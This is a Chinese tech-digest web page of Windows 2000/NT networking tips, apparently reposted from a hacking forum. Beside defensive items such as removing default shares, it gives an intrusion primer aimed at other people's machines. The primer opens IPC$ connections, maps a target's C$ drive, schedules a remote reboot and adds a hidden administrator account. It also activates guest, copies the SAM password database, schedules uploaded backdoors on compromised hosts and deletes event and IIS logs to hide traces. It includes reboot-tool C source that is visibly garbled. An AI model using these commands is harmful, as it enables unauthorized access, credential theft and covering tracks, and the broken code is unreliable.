网站建设| 数据库类| 图形图象| 程序设计| 现代办公| 操作系统| 考试认证| 网络技术| 软件工程| 电脑相关| 文学作品
网站开发| 网页制作| 操作系统| 图象图形| 考试认证| 数据库类| 程序设计| 硬件技术| 现代办公| 网络技术| 笑话频道
 
您的位置: 电脑书库首页-> 电脑文摘-> 网络技术-> 超级网络技术《三》

超级网络技术《三》
作者:佚名 来源:cfanclub 加入时间:2005-1-15
相关文章 相关书籍:
22)如何删除windows2K的默认贡献?

    首先打开记事本,输入如下内容:

    net share c$ /delete
    net share d$ /delete
    net share e$ /delete
    net share f$ /delete
    net share g$ /delete
    net share ipc$ /delete
    net share admin$ /delete

    这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~

    之后点击保存成批处理文件(后缀为:bat的文件!)!加入到启动组中就可以了~

×××××××××××××××××××××××××××××××××××××××××××××

    23)139端口的又一用法

    呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:1)不要利用本帖所提到的方法去搞恶意破坏!2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!

    废话不多说了~开始:

    如果你使用NT主机的话,那你可要注意了!
    重启NT主机的方法如下:

    1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
         建立一个IPC连接

    2:net use H: \\XXX.XXX.XXX.XXX\C$
         将对方的C盘映射为自己的h盘

    3:copy c on h:\reboot.bat
         Iisreset /reboot
         CTRL+Z
         在对方的C盘上生成一个能重启机器的文件

    4:net time \\XXX.XXX.XXX.XXX
         得到对方机器时间

    5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
         设定对方重启的时间!

    6:at \\XXX.XXX.XXX.XXX
         查看任务上面是否添加了这个任务

    7:等对方重启好了~

    上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
    #include "stdio.h"
    #include "windows.h"
    int main()
    {
    file://定义重启的时候发送给所有用户的消息
    LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
    file://尝试用最简单的API函数重启
    if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
    if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
    file://因为上面的重启不成功,所以需要调整本进程的特权
    HANDLE hToken;
    TOKEN_PRIVILEGES tkp;
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
    file://获取重启的特权   SE_SHUTDOWN_NAME
    LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
    tkp.PrivilegeCount=1;
    tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
    file://判断是NT内核还是9X内核,选择用不同的方式
    if(!GetVersion()& 0x80000000))
    InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
    else if (!ExitWindowXXX(EWX_REBOOT,0))
    if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
    return FALSE;
    return TRUE;

    对了,再次说明啊,别用本文提到的方法搞破坏,小心警察叔叔打PP~呵呵

×××××××××××××××××××××××××××××××××××××××××××××

    24)利用批处理文件来建立一个记录3389登陆者信息的记录器

    由于Terminal Service默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?很简单:

    建立一个批处理文件:内容如下:

    @echo off
    date/t >> c:\3389log.txt
    :TS3389
    time/t >> c:\3389log.txt
    netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
    goto :TS3389

    之后保存!

    如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!记录了当天日志,还有连接时间……资料~开始反击~呵呵

×××××××××××××××××××××××××××××××××××××××××××××

    25)网络命令小节(最近因为新学HACK的朋友人数上涨了~所以把我的这个陈年老调又一次拿出来,因为是我刚来S8S8的时候就整理的了,所以可能会有些错误的地方,如果发现请帮忙指出!)--呵呵,第一个问题只对菜鸟有作用!如果你是高手或者是自认为高手的话,请从第二题看起!

    A、NET命令:

    IPC连接:格式 net use \\对方IP\ipc$ "密码" user:"用户名"                『建立IPC连接~』
                         net use \\对方IP\ipc$ /delete         『断开连接~』

    以下操作需要在连接到对方主机后才可进行!!!

    net user coldcrysky xyz /add          『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』

    net localgroup Administrator coldcrysky /add            『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊!!!^_^』

    net use z:\\对方IP\C$                     『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』
    net start telnet                            『开启TELNET』
    net user guest /active:yes             『激活GUEST』
    net user guest coldcrysky               『把GUEST密码改为COLDCRYSKY』

    B、AT命令:

    查看远程机时间:net time \\对方IP

    加入一项新任务:

    at \\对方IP 时间   文件名             『用来把自己上传的后门程序在制定时间运行,方便以后进入肉鸡!』

    C、TELNET命令:

    telnet 对方IP 端口                   『作用不用我说了吧???』

    D、FTP命令:

    登陆:ftp 对方网址(IP地址)
    上传文件:get 文件在本机完整路径 对方文件存放完整路径
    下载文件:put 对方文件完整路径 本机存放文件路径

    E、COPY命令:

    在建立连接后(尤其是IPC$连接后,很有用的命令哦~)
    ⑴copy index.htm \\127.0.0.1\c$\index.htm
      『将本机index.htm文件复制到127.0.0.1的C盘下,如果要放到对方的NT目录下,则把C改为admin$』
    ⑵copy \\127.0.0.1\admin\repair\sam_ c:      『将远程机数据库文件拷贝到本机C盘根目录下』

    F、SET命令:

    主要用于分析目标计算机的基本信息用!具体使用方法请查找相关文件!

    G、NBTSTAT命令:

    nbtstat -A 对方IP (这个A大写)

    『在其中显示<037>前面的英文或数字就是计算机名称!当然,也可以利用PING -A 对方ip的方法来查看对方主机名!效果相同!!!』

    H、SHUTDOWN命令:

    『用来关闭对方NT服务的命令』格式如下:
    shutdown \\IP地址 t:20
    『20秒后自动关闭对方NT服务!由于对对方机器影响较大,慎用!!!』

    I、DIR命令:

    还用我说么?大家是不是早就该掌握了???(不知道的还是查阅相关资料吧~~~)

    J、ECHO命令:

    echo coldcrysky >index.htm         『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
    echo coldcrysky >>index.htm       『把coldcrysky加入到index.htm中』

    K、ATTRIB命令:

    更改文件属性用,格式:
    Attrib -r index.htm         『去掉只读属性』(+- 分别代表增加和减少)

    L、DEL命令:

    『删除日志的时候用!』
      del c:\winnt\system32\logfiles\*.*
      del c:\winnt\system32\config\*.evt
      del c:\winnt\system32\dtclog\*.*
      del c:\winnt\system32\*.log
      del c:\winnt\system32\*.txt
      del c:\winnt\*.txt
      del c:\winnt\*.log

    M、PING命令:

    -t :ping制定IP,知道网络断开或按CTRL+C结束!
    -a :解释PING IP的主机名
    -n count :发送count指定的ECHO数据包,默认为4个!


××××××××××××××××××××××××××××××××××××××××××××× 

    26)这里我必须(或者说不得不重新重申一个命令!不过说之前我要把这个命令的相关命令稍微介绍一下!)

    我要说的命令就是:开启服务和停止服务的net start       and      net stop

    这两个命令大多数朋友已经很熟悉了吧?不过为了方便更多的菜鸟能看明白我要说的意思,不用再看其他相关文章,所以我简单说两句:net start是开启服务!那么,如何开启呢?比如,我们这里要开启telnet服务,那就直接再2K的cmd下输入:net start telnet就OK了~关闭一项服务的话,把start换成stop就OK了~不过这里必须要注意:你所关闭的服务必须是已经开启的服务!!!好像是一句废话

    OK,有了这个前提后,下面就继续介绍:那么,net start和net stop到底能开启什么服务?其实这点也不需要你强记,记住这个命令就可以了:net help start和net help stop,这两个会显示出你所能开启的服务有那些~~

    这里比如我们查到了这个服务“CLIENT SERVICE FOR NETWARE”,那么当这个命令使用net start和net stop的时候,你必须在这项服务上面加上“”,原因是因为这个服务名称中带有空格!如果服务名称中不带空格,你可以不用带这个引号!!!这点是我强调的问题!大家一定不要忘记了!『前些天看到S8S8.net的黑白新区中有人说net start 和 net stop后面的服务名必须带空格是错误的!明白原因了吧?』

×××××××××××××××××××××××××××××××××××××××××××××


[文章录入员:sky365]

相关文章 相关书籍:
本站推荐内容

近期主机类热搜关键词:
美国服务器 美国服务器租用 海外服务器租用 国外服务器租用

网络技术
域名知识
服务器专题
网络安全
组网技术
网络基础
网络应用
其它
电脑教程阅读排行
·各种型号的ADSL路由设置方法
·ADSL上网速度慢的原因及快速排...
·用nero制作WIN98多功能启...
·共享ADSL的几种方法
·网络常用命令
·关于一些提高网速的软件
·代理服务器架设与维护
·超级网络技术《一》
·局域网最常见十大错误及解决
·保存网页图片的八种方法